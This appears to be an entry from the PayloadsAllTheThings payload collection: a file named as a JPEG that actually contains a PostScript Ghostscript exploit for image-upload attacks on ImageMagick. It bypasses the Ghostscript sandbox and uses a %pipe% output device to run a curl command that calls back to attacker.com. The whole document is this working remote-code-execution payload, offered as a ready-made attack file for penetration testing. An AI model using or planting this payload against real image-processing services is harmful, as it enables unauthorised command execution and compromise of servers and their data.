PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg
2021-03-24 22:26:23 +01:00

6 lines
No EOL
178 B
Text

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops